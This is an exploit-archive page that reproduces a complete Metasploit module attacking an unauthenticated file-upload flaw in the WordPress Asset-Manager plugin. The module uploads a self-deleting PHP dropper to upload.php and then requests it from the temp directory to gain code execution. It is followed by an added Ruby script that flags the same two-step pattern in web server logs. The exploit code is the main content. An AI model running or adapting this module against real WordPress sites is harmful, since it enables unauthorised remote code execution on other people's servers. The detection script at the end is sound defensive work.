WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This module, from the Metasploit exploit library, targets a vulnerability found in the WordPress Asset-Manager plugin version 2.0 and below. It allows PHP files to be uploaded: a user can upload a file to a temporary directory without authentication, which leads to arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # PHP dropper that writes the real payload, runs it and deletes itself
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin reads the file from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The file lands in a web-accessible temp directory, so a GET executes it
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
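The module above leaves a recognisable two-step trace in web server logs: an unauthenticated POST to the plugin's upload.php, then a GET for a .php file under wp-content/uploads/assets/temp/ from the same client. The following detection script is an added example written for this page, not part of the original post or of the Metasploit module; the log lines it scans are constructed, and the path patterns are taken from the module's own URIs.

```ruby
# Added example (not from the original post or the Metasploit module):
# scan combined-format (Apache/nginx) access log lines for the two-stage
# pattern this exploit produces, and flag any request for PHP in the
# plugin's temp upload directory even when no upload was seen.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

UPLOAD_ENDPOINT = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP        = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}

# Returns an array of findings, each a hash with :ip, :kind, :path and :status.
# :kind is :upload_attempt, :upload_then_execute (same IP uploaded earlier)
# or :temp_php_request (PHP fetched from the temp directory with no prior upload).
def detect_asset_manager_abuse(lines)
  uploads = Hash.new { |h, k| h[k] = [] }   # ip => paths POSTed to upload.php
  findings = []
  lines.each do |line|
    m = LOG_LINE.match(line) or next        # skip lines not in combined format
    ip, method, status = m[:ip], m[:method], m[:status]
    path = m[:path].sub(/\?.*/, '')         # drop any query string before matching
    if method == 'POST' && path =~ UPLOAD_ENDPOINT
      uploads[ip] << path
      findings << { ip: ip, kind: :upload_attempt, path: path, status: status }
    elsif method == 'GET' && path =~ TEMP_PHP
      kind = uploads.key?(ip) ? :upload_then_execute : :temp_php_request
      findings << { ip: ip, kind: kind, path: path, status: status }
    end
  end
  findings
end

# Constructed sample log lines (not from any real server).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [26/May/2012:10:01:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.7 - - [26/May/2012:10:01:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
  203.0.113.7 - - [26/May/2012:10:01:06 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzpa.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [26/May/2012:10:02:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/report.pdf HTTP/1.1" 200 8802 "-" "Mozilla/5.0"
LOG

if $PROGRAM_NAME == __FILE__
  detect_asset_manager_abuse(SAMPLE_LOG.lines).each do |f|
    puts "#{f[:kind]} from #{f[:ip]}: #{f[:path]} (HTTP #{f[:status]})"
  end
end
```

A 200 on the second stage is the strongest signal; a 404 there still indicates someone probing the temp directory and is worth keeping as a lower-severity finding.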